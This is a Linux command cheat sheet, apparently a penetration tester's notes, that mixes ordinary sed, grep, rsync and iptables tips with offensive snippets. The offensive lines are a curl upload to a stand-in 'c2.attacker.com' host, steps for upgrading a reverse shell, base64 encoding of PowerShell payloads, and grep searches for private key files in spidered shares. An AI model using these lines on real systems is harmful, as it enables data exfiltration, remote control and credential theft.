Useful commands in Linux #

comm #

Substitute if not satisfied with diff¹
1
comm <-123> file1 file2 2>/dev/null

read #

Used for pausing mid loop and possibly asking for user input

Usually seen with <Press any key to continue>

1 2	`# Command below will pause the bash script till <space> is pressed read -s -d ' '`

sed #

Basic Sed Commands #

Replace 'newlines' or \n with sed

1 2	`cat targets.txt\| sed -z "s/\n/\/\nhttps:\/\//g" > targets_https.txt cat naabu_output.txt\| sed -z "s/\n/\/\nhttps:\/\//g" > naabu_all_ports_withoutIPs_https.txt`

Remove 1st and last character
1
cat lines.txt|sed "s/^.//;s/.$//"

Recursive sed #

In case you want to change values in a lot of text files
One of the many ways ²

Change the 4 values between < >

1	`find <DIRECTORY_TO_FIND_FROM> $ -type d -name <DIRECTORY_YOU_WANT_TO_AVOID> -prune $ -o -type f -print0 \| xargs -0 sed -i 's/<ORIGINAL_TEXT>/<NEW_TEXT>/g'`

shred #

Delete files
This cannot easily although still possible to be recovered
1
shred -u <file_to_delete>

testdisk #

Recover accidentally deleted file (i.e. using rm)³

1 2	`sudo testdisk # View step 8 of the source. Select the option "Undelete" might not be there, choose "List"`

ps (Wide output) #

Everybody knows ps aux
this however generates a limited output
to show the whole command, do: (add or lessen 'w' if needed)
1
ps auxwww

grep #

Asides from the common uses of grep

to filter out all lines ending in a specific character

Use case: filtering out exported URLs which has duplicates where one URL ends in '/' and one without

echo "aaaaaaa.rar\nbbbbbbbbrar" > /tmp/temp.txt

$ cat /tmp/temp.txt | grep 'rar$'
aaaaaaa.rar
bbbbbbbbrar

#Add '\b' for "word-boundary"
$ cat /tmp/temp.txt | grep '\brar$'
aaaaaaa.rar

#Just add '-v' after 'grep' to "select non-matching lines" / inverse

RDP #

Connecting to a Windows host via RDP

1	`xfreerdp +nego +sec-rdp +sec-tls +sec-nla /v:<hostname/IP> /d: /u:<username> /p:<password> /size:90%`

Compressed RDP for low bandwidth or slow RDP connections

# MTU config first
ifconfig mtu 1200 <interface>
ifconfig mtu 1200 tun0

# rdesktop
rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u <USERNAME> -p <PASSWORD> 192.168.1.5
rdesktop -d <domain> -u <username> -p <password or '-' for prompt> -a 16 -P -z -E -T <TAG-WindowName> <RDPHOST_IP>
rdesktop -d company.local -u administrator -p P@ssw0rd -a 16 -P -z -E -T COMPANY-DC3 10.10.10.100

iptables ⁴⁵ #

# View rules
sudo iptables -L --line-numbers

# Add rule
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

# Drop from everybody else
sudo iptables -A INPUT -p tcp --dport 22 -j DROP

# Save rules
sudo /sbin/iptables–save

# Delete Rule
sudo iptables -D INPUT <line_num>

# Example:
# Only allow SSH connection from 192.168.1.0/24
sudo iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 22 -j DROP

Mirror a website #

1	`wget --mirror --convert-links --adjust-extension --page-requisites --wait=1 -o wget-mirror.log --no-parent https://example.org`

Upload files via Curl #

Combine with Simple HTTP(s) Servers

1 2	`curl -k --user 'root:toor' --upload-file file.zip https://127.0.0.1:8000/file.zip curl -k --user 'root:haxorz' --upload-file file.zip https://c2.attacker.com:443/file.zip`

Upgrade Reverse shell to fully interactive TTY⁶ #

In reverse shell

1 2	`python -c 'import pty; pty.spawn("/bin/bash")' <Ctrl-Z>`

In Attacker console
1 2
stty raw -echo fg

In reverse shell

reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Create a user #

# Create a user
useradd user -U -s /bin/bash
# Create a sudo user
useradd user -G sudo -U -s /bin/bash

Transfer files using nc (netcat)⁷ #

Basic

# Receiving
nc -l -p 9999 > received_file.txt
# Sending
nc 192.168.0.1 9999 < received_file.txt

With compression

# Receiving
nc -l -p 9999 | xz -dc | tar xvf -
# Sending
tar cvf - . | xz -c | nc 192.168.0.1 9999

Base64 encode #

Some use cases:

Encoding Powershell one-liners

1	`iconv -f ASCII -t UTF-16LE powershell_payload.txt \| base64 \| tr -d "\n"`

Another way below but prioritize above

1 2	`echo -n 'Invoke-WebRequest -Uri "http://www.contoso.com" -OutFile "C:\path\file"' \| iconv -f UTF8 -t UTF16LE \| base64 -w 0 # Remove the % character at the end`

Rsync #

Similar to SCP but better overall especially long term⁸

1	`rsync -azP [email protected]:/home/some_directory ./`

Compressed RDP for low bandwidth #

Lower your MTU first

1 2	`ifconfig mtu 1200 <interface> ifconfig mtu 1200 tun0`

rdesktop

rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u <USERNAME> -p <PASSWORD> 192.168.1.5
rdesktop -a 16 -z -r sound:remote -x b -g 1900x1000 -u master -p masterlab 192.168.1.5

rdesktop -a 16 -P -z -E -T <TAG-WindowName> -d <domain> -u <username> -p <password or '-' for prompt> 192.168.1.5
rdesktop -a 16 -P -z -E -T COMPANY-DC3 -d company.local -u administrator -p P@ssw0rd 192.168.1.5

Encrypting files #

zip⁸ #

1 2	`zip -e secure.tar.xz.zip notsecure.tar.xz -P someGoodPassword unzip secure.tar.xz.zip`

tar & OpenSSL⁹¹⁰ #

Unreliable decryption (Have not yet figured out if it's due to different openssl versions or arch)

This one requires an active tty, need to manually type passphrase

1	`tar --xz -cvf - * \| openssl enc -e -aes256 -out secured.tar.gz`

Did not work in some instances, try on Debian

1	`tar --xz -cvf - * \| openssl enc -e -aes256 -out secured.tar.gz -pass file:<( echo -n "someGoodPassword" )`

Decryption

1	`openssl enc -d -aes256 -in secured.tar.gz \| tar --xz -xv`

Generate random passwords #

openssl rand 256 | sha256sum | cut -d " " -f1

SERVICE_PASSWORD=$(openssl rand 32 | sha256sum | cut -d' ' -f1)
echo $SERVICE_PASSWORD

Go through filenames with spaces #

Basic¹¹

find . -type f -name '*.*' -print0 | 
while IFS= read -r -d '' file; do
    printf '%s\n' "$file"
done

Sample Use Case:
- Export thunderbird inbox to get attachments and move all of the exported attachments into 1 folder for easy viewing/archiving
  - In Thunderbird: ImportExportTools NG -> Export all messages in the folder - > as single text file (with attachments)
  - Sample command:
    1
    find ../Thunderbird_Export/ -type f -name '*.*' -print0 | while IFS= read -r -d '' file; do mv "$file" .;done

List files and sort via date time #

ls -t

Sort contents of a file in reverse #

Sort from the last letter to the first ¹³
1
rev file.txt | sort | rev

Beep #

Beep! ¹⁴
Useful when you want to get notified if a task has finished (i.e. nmap scan, hashcat cracking).
Productivity, no idle time/processing power
Make sure the Sound card is enabled on the VM settings

Basic Usage

1 2	`sudo apt install beep sudo env -i beep`

Practical Usage

echo 'alias beep="sudo env -i beep"' > ~/.zshrc
source ~/.zshrc

sudo nmap -sn iL subnets.txt && beep
sudo hashcat -a 0 hash.list rockyou.txt && beep

grep for file extensions #

This is when scouring a list not your own filesystem
I use this when looking for spidered shares
- If you search for .pub for example, you may end up seeing ....Web.Publishing/notcool.js
- Which is why we search for a file extension beside \n ¹⁵
  1 2 3 4
  sudo apt install -y pcregrep cat spidered_shares.txt|pcregrep -M "\.pub.\n" cat spidered_shares.txt|pcregrep -M "\.key.\n" cat spidered_shares.txt|pcregrep -M "\.ppk.\n"

Last update: April 14, 2022